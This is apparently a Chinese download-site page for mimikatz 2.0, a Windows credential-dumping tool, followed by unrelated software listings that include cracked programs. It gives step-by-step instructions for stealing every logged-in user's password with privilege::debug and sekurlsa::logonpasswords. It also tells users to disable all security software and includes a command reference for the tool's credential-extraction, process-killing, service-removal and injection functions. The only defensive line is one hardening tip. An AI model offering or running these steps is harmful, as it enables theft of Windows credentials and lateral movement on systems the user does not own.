mimikatz2.0是一个简单且好用的windows密码抓取神器,它可帮助用户一键抓取window密码,其具有操作简单、使用方便等特点。新版能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP) 的登陆认证。建议默认禁止RestrictedAdmin模式登录。使用mimikatz2.0请关闭本机所有的
安全软件
,因为其属于黑客程序,安全软件不退出就无法运行。
获取windows密码的方法很简单,mimikatz2.0版本的只需要两条命令就可以了:
1、首先打开mimikatz2.0,该版本分为32位和64位,用户可根据自己计算机的操作系统进行相应选择,若不知道自己的操作系统位数,请鼠标右键点击“计算机”-“属性”,在系统类型中即可知晓
2、打开之后先输入privilege::debug //提升权限
2、再输入sekurlsa::logonpasswords //抓取密码
3、获取本机的所有账号的Windows密码
一、常规的操作使用命令
1.mimikatz # cls -->清屏,类似dos命令cls
2.mimikatz # exit -->退出mimikatz
3.mimikatz #version -->查看当前的mimikatz的版本
二、系统方面的操作使用命令:system
1.mimikatz #system::user -->查看当前登录的系统用户
2.mimikazt #system::computer -->返回当前的计算机名称
三、在服务器终端的操作命令: ts
1.mimikatz #ts::sessions -->显示当前的会话
2.mimikatz #ts::processes windows-d.vm.nirvana.local -->显示服务器的进程和对应的pid情况等
四、系统服务相关的操作使用命令:service
五、系统进程相关操作的使用命令:process
六、系统线程相关操作使用命令:thread
七、系统句柄相关操作使用命令:handle
八、加密相关操作使用命令:crypto
九、注入操作使用命令:inject
十、其他基础命令
1.cls清屏
2.exit退出
3.version查看mimikatz的版本
4.help查看帮助信息
5.system::user查看当前登录的系统用户
6.system::computer查看计算机名称
7.process::list列出进程
8.process::suspend进程名称 暂停进程
9.process::stop进程名称 结束进程
10.process::modules列出系统的核心模块及所在位置
11.service::list列出系统的服务
12.service::remove移除系统的服务
13.service::start stop服务名称 启动或停止服务
14.privilege::list列出权限列表
15.privilege::enable激活一个或多个权限
16.privilege::debug提升权限
17.nogpo::cmd打开系统的cmd.exe
18.nogpo::regedit打开系统的注册表
19.nogpo::taskmgr打开任务管理器
20.ts::sessions显示当前的会话
21.ts::processes显示进程和对应的pid情况等
22.sekurlsa::wdigest获取本地用户信息及密码
23.sekurlsa::wdigest获取kerberos用户信息及密码
24.sekurlsa::tspkg获取tspkg用户信息及密码
25.sekurlsa::logonPasswords获登陆用户信息及密码
彩影ARP防火墙(AntiARP)
安全管家Password Depot破解补丁
安全管家隐身侠加密软件
安全管家悬镜管家
安全管家AntiRansomware 2020(防勒索病毒安全保护软件)
安全管家超级巡警
安全管家任意文件加解密
安全管家ESET NOD32
安全管家联想远程软件服务免安装版
安全管家溯雪bate7客户端
安全管家百密磁盘柜加密软件
安全管家pgp文件加密解密软件(PGP Tool)免费版
安全管家狼人杀官方正版 v3.0.2.1 安卓版
脑力开发口袋狼人杀破解版 v3.0.2.1 安卓版
脑力开发围棋手机版 v1.27 安卓版
脑力开发棋牌21点手机版 v5.9.0 安卓版
脑力开发红心大战游戏 v1.0.1 安卓版
脑力开发江汉游仙桃晃晃完整版 v5.5 安卓版
脑力开发炉石传说美服手机版 v19.2.69054 安卓版
脑力开发指上谈兵手游 v2.0.0 安卓版
脑力开发